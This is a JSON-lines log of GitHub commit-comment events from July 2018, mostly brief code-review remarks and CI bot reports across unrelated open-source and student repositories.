{"id":"7950846225","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29672881,"position":22,"line":127,"path":"monopoly.py","commit_id":"8ae96a9bfc2422494cee1ef1da5389dd1263e8b4","created_at":"2018-07-11T15:24:34Z","updated_at":"2018-07-11T15:24:34Z","author_association":"NONE","body":"I think you can eliminate the `tile_type` attribute. It's not adding any information in most cases (and in general, unused/redundant code is a a hint you need to prune something). \r\n\r\nConsider all of these:\r\n\r\n```\r\nGoTile(0, None, None, 'go'),\r\nJailTile(10, None, None, 'jail'),\r\nIncomeTaxTile(4, None, None, 'income_tax'),\r\nLuxuryTaxTile(38, None, None, 'luxury_tax')\r\n```\r\n\r\nThe argument you pass for the `tile_type` parameter says basically the same thing as the class name. You could just as well do either of these:\r\n\r\n```\r\nisinstance(tile, JailTile)\r\ntile.tile_type == 'jail'\r\n```\r\n\r\nAnd the former has the benefit of a) not requiring a `tile_type` attribute and b) it doesn't use a string literal which is susceptible to typos (`tile.tile_type == 'jial'`).\r\n\r\nAlso, you can get the type of an object with the `type` function. It returns a reference to the class, much in the same way that you can have a reference to a function:\r\n\r\nhttps://docs.python.org/3/library/functions.html#type\r\n\r\n```\r\n# This is a \"class definition\". It puts the name `Foo` in scope, referring to the class\r\nclass Foo:\r\n    pass\r\n\r\nfoo = Foo()\r\n\r\n# Defining a variable that holds a reference to `Foo`. In Python, types are \"first class citizens\" which means you can treat them like other values. (In C++, you can't do this.)\r\nfoo_class = Foo\r\n\r\n# Again, defining a variable that holds a reference to `Foo`, just in a different way.\r\nfoo_class_again = type(foo)\r\n\r\n# Instantiating more `Foo`s. Note that instantiation looks exactly like calling a function (just adding an argument list in parenthesis).\r\nmore_foo1 = foo_class()\r\nmore_foo2 = foo_class_again()\r\n\r\nassert(isinstance(foo, Foo))\r\nassert(isinstance(more_foo1, Foo))\r\nassert(isinstance(more_foo2, Foo))\r\n```"}},"created_at":"2018-07-11T15:24:34Z"}
{"id":"7950846338","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29672882,"position":null,"line":null,"path":null,"commit_id":"3722992de1fd97b42c1da3d6b18a196e4a249026","created_at":"2018-07-11T15:24:35Z","updated_at":"2018-07-11T15:24:35Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-152429 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-152429\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T15:24:35Z"}
{"id":"7950847983","type":"CommitCommentEvent","actor":{"login":"lmaaronson"},"repo":{"name":"lmaaronson/code200-job-found"},"payload":{"comment":{"id":29672886,"position":20,"line":20,"path":"README.md","commit_id":"5b652b6926adccea0e34f5ccc436f85757a4f0df","created_at":"2018-07-11T15:24:50Z","updated_at":"2018-07-11T15:24:50Z","author_association":"OWNER","body":"### **Prerequisites**"}},"created_at":"2018-07-11T15:24:50Z"}
{"id":"7950849796","type":"CommitCommentEvent","actor":{"login":"HammenWS"},"repo":{"name":"rainlab/translate-plugin"},"payload":{"comment":{"id":29672892,"position":15,"line":49,"path":"models/MessageImport.php","commit_id":"9d411c3d8223cb978018dbbe589b8b9c13b2e6e9","created_at":"2018-07-11T15:25:07Z","updated_at":"2018-07-11T15:25:07Z","author_association":"NONE","body":"@LukeTowers The `$result` variable is not used after this line. And your unit test `ImportMessageTest` is also failing. I guess you should move these three lines to just above line 44."}},"created_at":"2018-07-11T15:25:07Z"}
{"id":"7950849893","type":"CommitCommentEvent","actor":{"login":"lmaaronson"},"repo":{"name":"lmaaronson/code200-job-found"},"payload":{"comment":{"id":29672893,"position":21,"line":21,"path":"README.md","commit_id":"5b652b6926adccea0e34f5ccc436f85757a4f0df","created_at":"2018-07-11T15:25:08Z","updated_at":"2018-07-11T15:25:08Z","author_association":"OWNER","body":"_+There are a few things you'll need to get it running, \r\n_"}},"created_at":"2018-07-11T15:25:08Z"}
{"id":"7950851510","type":"CommitCommentEvent","actor":{"login":"jbeich"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29672894,"position":12,"line":89,"path":"src/hb-private.hh","commit_id":"292c100d6141eb2e981fa632602d73768f748727","created_at":"2018-07-11T15:25:22Z","updated_at":"2018-07-11T15:25:22Z","author_association":"NONE","body":"Are you sure about using `constexpr` before pre-C++11 fallback?"}},"created_at":"2018-07-11T15:25:22Z"}
{"id":"7950851709","type":"CommitCommentEvent","actor":{"login":"lmaaronson"},"repo":{"name":"lmaaronson/code200-job-found"},"payload":{"comment":{"id":29672895,"position":22,"line":22,"path":"README.md","commit_id":"5b652b6926adccea0e34f5ccc436f85757a4f0df","created_at":"2018-07-11T15:25:24Z","updated_at":"2018-07-11T15:25:24Z","author_association":"OWNER","body":"_+The following will need to be installed locally_"}},"created_at":"2018-07-11T15:25:24Z"}
{"id":"7950874887","type":"CommitCommentEvent","actor":{"login":"behdad"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29672947,"position":12,"line":89,"path":"src/hb-private.hh","commit_id":"292c100d6141eb2e981fa632602d73768f748727","created_at":"2018-07-11T15:28:56Z","updated_at":"2018-07-11T15:28:56Z","author_association":"COLLABORATOR","body":"You're right. Fixed already."}},"created_at":"2018-07-11T15:28:56Z"}
{"id":"7950878590","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29672953,"position":11,"line":11,"path":"lib/elixir/lib/dict.ex","commit_id":"43f80d382b22f03fe021206b234abdabb91b49da","created_at":"2018-07-11T15:29:31Z","updated_at":"2018-07-11T15:29:31Z","author_association":"MEMBER","body":"No because otherwise we would force `mix xref` to have a markdown trimmer. We will push a bunch of complexity to other tools."}},"created_at":"2018-07-11T15:29:31Z"}
{"id":"7950880317","type":"CommitCommentEvent","actor":{"login":"morozkin"},"repo":{"name":"skandakov/exponea-ios-sdk"},"payload":{"comment":{"id":29672955,"position":53,"line":71,"path":"ExponeaSDK/ExponeaSDK/Classes/Database/DatabaseManager.swift","commit_id":"44e7a1b3ea270bd5dabf4515577f7bcd78c6c1b5","created_at":"2018-07-11T15:29:47Z","updated_at":"2018-07-11T15:29:47Z","author_association":"NONE","body":"это серьезно работает? даже тип не указан"}},"created_at":"2018-07-11T15:29:47Z"}
{"id":"7950882296","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29672965,"position":6,"line":5,"path":"lib/elixir/lib/dict.ex","commit_id":"43f80d382b22f03fe021206b234abdabb91b49da","created_at":"2018-07-11T15:30:06Z","updated_at":"2018-07-11T15:30:06Z","author_association":"MEMBER","body":"I would rather remove it from other places."}},"created_at":"2018-07-11T15:30:06Z"}
{"id":"7950890569","type":"CommitCommentEvent","actor":{"login":"akiraandy"},"repo":{"name":"MayaCherry1/mastermind"},"payload":{"comment":{"id":29672993,"position":30,"line":19,"path":"lib/end_game.rb","commit_id":"838250d36b6c130accf6147e5604af0bd42e254e","created_at":"2018-07-11T15:31:18Z","updated_at":"2018-07-11T15:31:18Z","author_association":"COLLABORATOR","body":"why have an explicit `return`? Can we get rid of that `return` and rely on Ruby's implicit return instead?"}},"created_at":"2018-07-11T15:31:18Z"}
{"id":"7950893790","type":"CommitCommentEvent","actor":{"login":"kdvolder"},"repo":{"name":"spring-projects/sts4"},"payload":{"comment":{"id":29672997,"position":null,"line":null,"path":null,"commit_id":"2342dc8d3bfb974291883d9ed6a7a1be369b1567","created_at":"2018-07-11T15:31:46Z","updated_at":"2018-07-11T15:31:46Z","author_association":"MEMBER","body":"3.9.5 has already been released so it is too late to fix it. But I think a fix should be coming in the next release."}},"created_at":"2018-07-11T15:31:46Z"}
{"id":"7950894296","type":"CommitCommentEvent","actor":{"login":"MartinBenninger"},"repo":{"name":"MartinBenninger/test-rtc-git-connector"},"payload":{"comment":{"id":29672999,"position":null,"line":null,"path":null,"commit_id":"71a6debb150dbe8ed7be4b8250a12c82e0e12bb3","created_at":"2018-07-11T15:31:51Z","updated_at":"2018-07-11T15:31:51Z","author_association":"OWNER","body":"This commit was linked by [RTC Work Item 51](https://localhost:7443/jazz/resource/itemName/com.ibm.team.workitem.WorkItem/51) on behalf of ADMIN"}},"created_at":"2018-07-11T15:31:51Z"}
{"id":"7950894305","type":"CommitCommentEvent","actor":{"login":"MartinBenninger"},"repo":{"name":"MartinBenninger/test-rtc-git-connector"},"payload":{"comment":{"id":29673001,"position":null,"line":null,"path":null,"commit_id":"f54d89fb5b811ee129504f88fe339df0b26581c1","created_at":"2018-07-11T15:31:51Z","updated_at":"2018-07-11T15:31:51Z","author_association":"OWNER","body":"This commit was linked by [RTC Work Item 51](https://localhost:7443/jazz/resource/itemName/com.ibm.team.workitem.WorkItem/51) on behalf of ADMIN"}},"created_at":"2018-07-11T15:31:51Z"}
{"id":"7950894308","type":"CommitCommentEvent","actor":{"login":"MartinBenninger"},"repo":{"name":"MartinBenninger/test-rtc-git-connector"},"payload":{"comment":{"id":29673000,"position":null,"line":null,"path":null,"commit_id":"22256654453c2dba08c88541f8f51963883c667a","created_at":"2018-07-11T15:31:51Z","updated_at":"2018-07-11T15:31:51Z","author_association":"OWNER","body":"This commit was linked by [RTC Work Item 51](https://localhost:7443/jazz/resource/itemName/com.ibm.team.workitem.WorkItem/51) on behalf of ADMIN"}},"created_at":"2018-07-11T15:31:51Z"}
{"id":"7950905155","type":"CommitCommentEvent","actor":{"login":"akiraandy"},"repo":{"name":"MayaCherry1/mastermind"},"payload":{"comment":{"id":29673024,"position":18,"line":13,"path":"lib/end_game.rb","commit_id":"838250d36b6c130accf6147e5604af0bd42e254e","created_at":"2018-07-11T15:33:31Z","updated_at":"2018-07-11T15:33:31Z","author_association":"COLLABORATOR","body":"this is a style thing and I would only do this in very simple cases like this but try using the ternary operator:\r\n`@game_state.has_won ? dialog.win_game : dialog.lose_game` will do the exact same you are doing here except in one line. Whatever follows the `?` represents what happens when the first argument `@game_state.has_won` is true, whatever follows the `:` represents what happens when `@game_state.has_won` is false."}},"created_at":"2018-07-11T15:33:31Z"}
{"id":"7950909556","type":"CommitCommentEvent","actor":{"login":"skandakov"},"repo":{"name":"skandakov/exponea-ios-sdk"},"payload":{"comment":{"id":29673032,"position":53,"line":71,"path":"ExponeaSDK/ExponeaSDK/Classes/Database/DatabaseManager.swift","commit_id":"44e7a1b3ea270bd5dabf4515577f7bcd78c6c1b5","created_at":"2018-07-11T15:34:13Z","updated_at":"2018-07-11T15:34:13Z","author_association":"OWNER","body":"Не работате, тут обернуто DISABLE_PERSISTENCE, я фиксил, а потом не закоммитил"}},"created_at":"2018-07-11T15:34:13Z"}
{"id":"7950912423","type":"CommitCommentEvent","actor":{"login":"beatngu13"},"repo":{"name":"retest/recheck-web"},"payload":{"comment":{"id":29673035,"position":null,"line":null,"path":null,"commit_id":"cd1fd43a13a86579fc2c6c490c574cd4613577f2","created_at":"2018-07-11T15:34:40Z","updated_at":"2018-07-11T15:34:40Z","author_association":"MEMBER","body":"IMHO: Don't waste too much time writing (that much) documentation before we actually have a somewhat stable version. Every time we change something, this has to be adpated as well.\r\n\r\nMoreover, the `README.md` gets bigger and bigger. We should ask ourselves: Who are we targeting with which document? Contributors, users, … there's also a wiki for each repo. Probably better suited for end-user documentation?"}},"created_at":"2018-07-11T15:34:40Z"}
{"id":"7950912500","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29673036,"position":null,"line":null,"path":null,"commit_id":"3c4029c051fe8ae658c042edb1ece4439a0e9dff","created_at":"2018-07-11T15:34:41Z","updated_at":"2018-07-11T15:34:41Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-45](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-45).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-45-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-11T15:34:41Z"}
{"id":"7950913553","type":"CommitCommentEvent","actor":{"login":"akiraandy"},"repo":{"name":"MayaCherry1/mastermind"},"payload":{"comment":{"id":29673041,"position":26,"line":26,"path":"lib/game_loop.rb","commit_id":"838250d36b6c130accf6147e5604af0bd42e254e","created_at":"2018-07-11T15:34:51Z","updated_at":"2018-07-11T15:34:51Z","author_association":"COLLABORATOR","body":"I like that you have a simple execution here. `play` is readable and easy to follow. 👍 "}},"created_at":"2018-07-11T15:34:51Z"}
{"id":"7950913597","type":"CommitCommentEvent","actor":{"login":"wagner-certat"},"repo":{"name":"aaronkaplan/Reference-Security-Incident-Taxonomy-Task-Force"},"payload":{"comment":{"id":29673042,"position":null,"line":null,"path":null,"commit_id":"c4772b41222f6ca0ddf31d59c9258c683036a83b","created_at":"2018-07-11T15:34:51Z","updated_at":"2018-07-11T15:34:51Z","author_association":"NONE","body":"lol, @amicaross was meant"}},"created_at":"2018-07-11T15:34:51Z"}
{"id":"7950915690","type":"CommitCommentEvent","actor":{"login":"morozkin"},"repo":{"name":"skandakov/exponea-ios-sdk"},"payload":{"comment":{"id":29673045,"position":19,"line":154,"path":"ExponeaSDK/ExponeaSDK/Classes/Exponea.swift","commit_id":"85bbfe7bf12538e04c2711baf629e87b8ba9ac97","created_at":"2018-07-11T15:35:13Z","updated_at":"2018-07-11T15:35:13Z","author_association":"NONE","body":"дерни внутри `configure(projectToken: String, authorization: Authorization, baseURL: String? = nil)`, зачем дублировать"}},"created_at":"2018-07-11T15:35:13Z"}
{"id":"7950916616","type":"CommitCommentEvent","actor":{"login":"18906441313"},"repo":{"name":"18906441313/token-profile"},"payload":{"comment":{"id":29673047,"position":null,"line":null,"path":null,"commit_id":"58084d27688d2ca14f75fc75e8d92369e2542af1","created_at":"2018-07-11T15:35:21Z","updated_at":"2018-07-11T15:35:21Z","author_association":"OWNER","body":"![0xeeda4282c7011f5e3ccbade16f60ebd41ef957cc png](https://user-images.githubusercontent.com/40595178/42583163-0abdb67c-8563-11e8-80b9-684a3e05179a.png)\r\n"}},"created_at":"2018-07-11T15:35:21Z"}
{"id":"7950922993","type":"CommitCommentEvent","actor":{"login":"mbrancato"},"repo":{"name":"mbrancato/logstash-output-http"},"payload":{"comment":{"id":29673060,"position":null,"line":null,"path":null,"commit_id":"06fd440777a4a7907a66ac9a73f9242afc2e577d","created_at":"2018-07-11T15:36:21Z","updated_at":"2018-07-11T15:36:21Z","author_association":"OWNER","body":"This is great, I will test. I was concerned because the way batch implemented the `sleep_for_attempt` is never actually slept and entered an infinite loop."}},"created_at":"2018-07-11T15:36:21Z"}
{"id":"7950925445","type":"CommitCommentEvent","actor":{"login":"akiraandy"},"repo":{"name":"MayaCherry1/mastermind"},"payload":{"comment":{"id":29673063,"position":14,"line":14,"path":"lib/game_state.rb","commit_id":"838250d36b6c130accf6147e5604af0bd42e254e","created_at":"2018-07-11T15:36:42Z","updated_at":"2018-07-11T15:36:42Z","author_association":"COLLABORATOR","body":"Can we extract `@colors` to a constant?"}},"created_at":"2018-07-11T15:36:42Z"}
{"id":"7950927991","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29673067,"position":7,"line":35,"path":"contracts/Splitter.sol","commit_id":"34dd3f7dd81dfa91cd438b080bd2890c6aca9185","created_at":"2018-07-11T15:37:07Z","updated_at":"2018-07-11T15:37:07Z","author_association":"NONE","body":"`msg.value` is immutable while your `fundsSent` is mutable. By assigning like that you \"achieve\" 2 things:\r\n\r\n- you introduce the potential for the developer to create a bug by doing `fundsSent++` or something along this line.\r\n- you spend extra gas unnecessarily."}},"created_at":"2018-07-11T15:37:07Z"}
{"id":"7950931318","type":"CommitCommentEvent","actor":{"login":"meischdaddy30"},"repo":{"name":"Kitt-AI/snowboy"},"payload":{"comment":{"id":29673073,"position":null,"line":null,"path":null,"commit_id":"797a17e96fc085dbd70a6fefeb15b9bc43f52913","created_at":"2018-07-11T15:37:37Z","updated_at":"2018-07-11T15:37:37Z","author_association":"NONE","body":"\"In this example, we used two models for the decoder and provided two callback functions. If the first hotword is detected, it’ll play a Ding sound. If the second hotword is detected, it’ll play a Dong sound.\"\r\n\r\nMy problem is when my MagicMirror is booted up and ready for listening, I say \"jarvis\" and I hear a ding but not the dong?  Tried increasing 2nd sensitivity and didn't work."}},"created_at":"2018-07-11T15:37:37Z"}
{"id":"7950935480","type":"CommitCommentEvent","actor":{"login":"akiraandy"},"repo":{"name":"MayaCherry1/mastermind"},"payload":{"comment":{"id":29673088,"position":14,"line":10,"path":"lib/guess.rb","commit_id":"838250d36b6c130accf6147e5604af0bd42e254e","created_at":"2018-07-11T15:38:18Z","updated_at":"2018-07-11T15:38:18Z","author_association":"COLLABORATOR","body":"I'm confused why `Pegs` needs a `game_state` object."}},"created_at":"2018-07-11T15:38:18Z"}
{"id":"7950942098","type":"CommitCommentEvent","actor":{"login":"Ron31"},"repo":{"name":"Willy82015/Electron"},"payload":{"comment":{"id":29673100,"position":null,"line":null,"path":null,"commit_id":"36743ec5db53b6db43c78edf5afc7b244d3b045b","created_at":"2018-07-11T15:39:20Z","updated_at":"2018-07-11T15:39:20Z","author_association":"COLLABORATOR","body":"Oki"}},"created_at":"2018-07-11T15:39:20Z"}
{"id":"7950942135","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29673101,"position":null,"line":null,"path":null,"commit_id":"88c6372ca41ef4f4f2d93eb6fd2454ada4d531d9","created_at":"2018-07-11T15:39:20Z","updated_at":"2018-07-11T15:39:20Z","author_association":"NONE","body":"BugFix-EMSAlphaAllocation (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2932 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-88c6372ca41ef4f4f2d93eb6fd2454ada4d531d9-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-88c6372ca41ef4f4f2d93eb6fd2454ada4d531d9-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T15:39:20Z"}
{"id":"7950942671","type":"CommitCommentEvent","actor":{"login":"heikoOlderdissen"},"repo":{"name":"heikoOlderdissen/0mainOpenSapGitCourse"},"payload":{"comment":{"id":29673102,"position":null,"line":null,"path":null,"commit_id":"d24f08446f1cc257e4ca0119e5a5553e7f1e2e52","created_at":"2018-07-11T15:39:25Z","updated_at":"2018-07-11T15:39:25Z","author_association":"OWNER","body":"Test Repository"}},"created_at":"2018-07-11T15:39:25Z"}
{"id":"7950942845","type":"CommitCommentEvent","actor":{"login":"npostavs"},"repo":{"name":"bradyt/dart-mode"},"payload":{"comment":{"id":29673103,"position":23,"line":403,"path":"dart-mode.el","commit_id":"39cb7b65cb25e3e9611e0dbdf212eb6ea469f907","created_at":"2018-07-11T15:39:27Z","updated_at":"2018-07-11T15:39:27Z","author_association":"NONE","body":"Any reason not to use `?\\{` rather than the hex escape here?\r\n\r\nBy the way, from what I read, dart can have arbitrary nesting in interpolated expressions, so you might run into problems with the regexp approach. Probably fine for a first cut though."}},"created_at":"2018-07-11T15:39:27Z"}
{"id":"7950943049","type":"CommitCommentEvent","actor":{"login":"npostavs"},"repo":{"name":"bradyt/dart-mode"},"payload":{"comment":{"id":29673104,"position":35,"line":415,"path":"dart-mode.el","commit_id":"39cb7b65cb25e3e9611e0dbdf212eb6ea469f907","created_at":"2018-07-11T15:39:29Z","updated_at":"2018-07-11T15:39:29Z","author_association":"NONE","body":"I think that `1` should be `(point-min)`. Or you could change the `/=` test to `(not (eq ...` and drop this test entirely."}},"created_at":"2018-07-11T15:39:29Z"}
{"id":"7950943375","type":"CommitCommentEvent","actor":{"login":"akiraandy"},"repo":{"name":"MayaCherry1/mastermind"},"payload":{"comment":{"id":29673105,"position":11,"line":7,"path":"lib/pegs.rb","commit_id":"838250d36b6c130accf6147e5604af0bd42e254e","created_at":"2018-07-11T15:39:32Z","updated_at":"2018-07-11T15:39:32Z","author_association":"COLLABORATOR","body":"Okay, I wouldn't pass a whole `game_state` object here. It's kinda bulky and what we really need is a secret code. I like how you had it before actually where you're passing a secret. Then you can clone it in your initialize method."}},"created_at":"2018-07-11T15:39:32Z"}
{"id":"7950947585","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29673110,"position":null,"line":null,"path":null,"commit_id":"51e1c55cad4af641a5dc14e5a3d08371559380f6","created_at":"2018-07-11T15:40:15Z","updated_at":"2018-07-11T15:40:15Z","author_association":"NONE","body":"Can you indent your test file so we can read it?"}},"created_at":"2018-07-11T15:40:15Z"}
{"id":"7950951661","type":"CommitCommentEvent","actor":{"login":"akiraandy"},"repo":{"name":"MayaCherry1/mastermind"},"payload":{"comment":{"id":29673118,"position":41,"line":41,"path":"spec/game_loop_spec.rb","commit_id":"838250d36b6c130accf6147e5604af0bd42e254e","created_at":"2018-07-11T15:40:51Z","updated_at":"2018-07-11T15:40:51Z","author_association":"COLLABORATOR","body":"nice mocking here 👍 "}},"created_at":"2018-07-11T15:40:51Z"}
{"id":"7950954367","type":"CommitCommentEvent","actor":{"login":"odeac"},"repo":{"name":"rchain/rchain"},"payload":{"comment":{"id":29673124,"position":16,"line":16,"path":"crypto/src/main/scala/coop/rchain/crypto/util/SecureRandomUtil.scala","commit_id":"154cfe4451a9a01b5707ae51e772be5768e55599","created_at":"2018-07-11T15:41:17Z","updated_at":"2018-07-11T15:41:17Z","author_association":"COLLABORATOR","body":"This should be the same as ```find(_.isSuccess)``` which is a bit more readable"}},"created_at":"2018-07-11T15:41:17Z"}
{"id":"7950955490","type":"CommitCommentEvent","actor":{"login":"akiraandy"},"repo":{"name":"MayaCherry1/mastermind"},"payload":{"comment":{"id":29673128,"position":17,"line":21,"path":"spec/game_setup_spec.rb","commit_id":"838250d36b6c130accf6147e5604af0bd42e254e","created_at":"2018-07-11T15:41:27Z","updated_at":"2018-07-11T15:41:27Z","author_association":"COLLABORATOR","body":"try not to get into the habit of pushing up pending tests"}},"created_at":"2018-07-11T15:41:27Z"}
{"id":"7950961669","type":"CommitCommentEvent","actor":{"login":"stomar"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":29673138,"position":5,"line":700,"path":"array.c","commit_id":"dae0f4388e875f23a553a14351f6a6e5b2a5dd6d","created_at":"2018-07-11T15:42:25Z","updated_at":"2018-07-11T15:42:25Z","author_association":"MEMBER","body":"@nobu Really?\r\n\r\n`{|var| block }` or `{ |var| block }` seems much more common throughout the existing docs and code."}},"created_at":"2018-07-11T15:42:25Z"}
{"id":"7950964762","type":"CommitCommentEvent","actor":{"login":"jordan-castelloe"},"repo":{"name":"ebventurino/SongList"},"payload":{"comment":{"id":29673143,"position":null,"line":null,"path":null,"commit_id":"3a1361576d51d1c0898a586d0d9b35bb3ce415a5","created_at":"2018-07-11T15:42:54Z","updated_at":"2018-07-11T15:42:54Z","author_association":"NONE","body":"Hey! This is a great start! You worked super hard yesterday and I can tell you learned a lot- that's awesome! I think it will be really beneficial to keep working on this as you have time. Also, quick note- it looks like you pushed up your node modules, which doesn't affect how the app works but it's generally not a good idea because there are sooooo many of them. Just stick them in your `.gitignore` in the future and you'll be good to go! (If you want help retroactively git ignoring them on this project, I'm happy to help with that too!)"}},"created_at":"2018-07-11T15:42:54Z"}
{"id":"7950965349","type":"CommitCommentEvent","actor":{"login":"z3ntu"},"repo":{"name":"openSUSE/osc"},"payload":{"comment":{"id":29673144,"position":null,"line":null,"path":null,"commit_id":"6d0b20782ea29ddf9519b3c8c7c6f275612fe64d","created_at":"2018-07-11T15:43:00Z","updated_at":"2018-07-11T15:43:00Z","author_association":"NONE","body":"@lethliel Could you please at least cherry-pick b730f880cfe85a8547f569355a21706f27ebfa78 if you don't want to just merge master into this branch? I encountered that problem even with the python3 branch and that commit fixed it there too."}},"created_at":"2018-07-11T15:43:00Z"}
{"id":"7950965513","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29673146,"position":6,"line":7,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-11T15:43:02Z","updated_at":"2018-07-11T15:43:02Z","author_association":"NONE","body":"You should indent this."}},"created_at":"2018-07-11T15:43:02Z"}
{"id":"7950969774","type":"CommitCommentEvent","actor":{"login":"kraj"},"repo":{"name":"WebPlatformForEmbedded/meta-wpe"},"payload":{"comment":{"id":29673152,"position":null,"line":null,"path":null,"commit_id":"2d1a731919e08f3de3f7193085631c3ffe53bed0","created_at":"2018-07-11T15:43:44Z","updated_at":"2018-07-11T15:43:44Z","author_association":"COLLABORATOR","body":"why do we need this ? there is another layer for gst https://github.com/OSSystems/meta-gstreamer1.0\r\nwill that fit what you intend to do ? having same package split over many layers is just going to cause confusion. "}},"created_at":"2018-07-11T15:43:44Z"}
{"id":"7950970464","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29673153,"position":67,"line":82,"path":"gui/config/CPlaneMatchingConfig.cpp","commit_id":"1c456da29b7f113a772a29615a42c35d12b97228","created_at":"2018-07-11T15:43:50Z","updated_at":"2018-07-11T15:43:50Z","author_association":"OWNER","body":"@EduFdez Here is the problem.\r\n\r\nWhen commented, there is no crash but these params are not written. And after closing the app, the file becomes blank. It gets completely erased."}},"created_at":"2018-07-11T15:43:50Z"}
{"id":"7950975397","type":"CommitCommentEvent","actor":{"login":"kremsy"},"repo":{"name":"ManiaControl/ManiaControl"},"payload":{"comment":{"id":29673161,"position":null,"line":null,"path":null,"commit_id":"2177858368317c82298e9aef745be79bc4a36cac","created_at":"2018-07-11T15:44:39Z","updated_at":"2018-07-11T15:44:39Z","author_association":"MEMBER","body":"I think you may messed something up with the positioning of the MX and update symbols:\r\n\r\n![grafik](https://user-images.githubusercontent.com/2006941/42583788-ff930986-8531-11e8-97ed-338e525330f6.png)\r\nWould be cool if you could recheck that nothing is changed when no Local Records Plugin is activated."}},"created_at":"2018-07-11T15:44:39Z"}
{"id":"7950976295","type":"CommitCommentEvent","actor":{"login":"andy505050"},"repo":{"name":"andy505050/MVCHomwork"},"payload":{"comment":{"id":29673167,"position":null,"line":null,"path":null,"commit_id":"b8a2d94e8cdf8cc0108a4f0db05882cbdeb3da5a","created_at":"2018-07-11T15:44:47Z","updated_at":"2018-07-11T15:44:47Z","author_association":"OWNER","body":"約40分鐘"}},"created_at":"2018-07-11T15:44:47Z"}
{"id":"7950982085","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29673181,"position":55,"line":43,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-11T15:45:41Z","updated_at":"2018-07-11T15:45:41Z","author_association":"NONE","body":"Not sure why you call it `paymentHash`. Nowhere in the code do I see that its value is compared to the hash of something.\r\nIs it a `paymentId`?"}},"created_at":"2018-07-11T15:45:41Z"}
{"id":"7950983407","type":"CommitCommentEvent","actor":{"login":"andmev"},"repo":{"name":"andmev/boibro"},"payload":{"comment":{"id":29673185,"position":12,"line":51,"path":"src/components/Player/index.js","commit_id":"accb22e368522a5107b0d5bbabc7391ee6f896c0","created_at":"2018-07-11T15:45:54Z","updated_at":"2018-07-11T15:45:54Z","author_association":"OWNER","body":"Workaround for fucking Android"}},"created_at":"2018-07-11T15:45:54Z"}
{"id":"7950986203","type":"CommitCommentEvent","actor":{"login":"ryanmortier"},"repo":{"name":"laravel/docs"},"payload":{"comment":{"id":29673192,"position":206,"line":241,"path":"authorization.md","commit_id":"e2cbae5cd44e01617fe3e74c22084d25c6438ccd","created_at":"2018-07-11T15:46:19Z","updated_at":"2018-07-11T15:46:19Z","author_association":"NONE","body":"This broke my application today when upgrading. Was expecting my policy to use the `show` method but it was trying to use a non-existent `view` method. This should have been in the upgrade documentation for sure."}},"created_at":"2018-07-11T15:46:19Z"}
{"id":"7950987051","type":"CommitCommentEvent","actor":{"login":"yushijinhun"},"repo":{"name":"huanghongxun/JFoenix"},"payload":{"comment":{"id":29673193,"position":null,"line":null,"path":null,"commit_id":"d474f77b3262add88050ecd4a35b60f9221822fb","created_at":"2018-07-11T15:46:29Z","updated_at":"2018-07-11T15:46:29Z","author_association":"NONE","body":"`jenkins` hhh..."}},"created_at":"2018-07-11T15:46:29Z"}
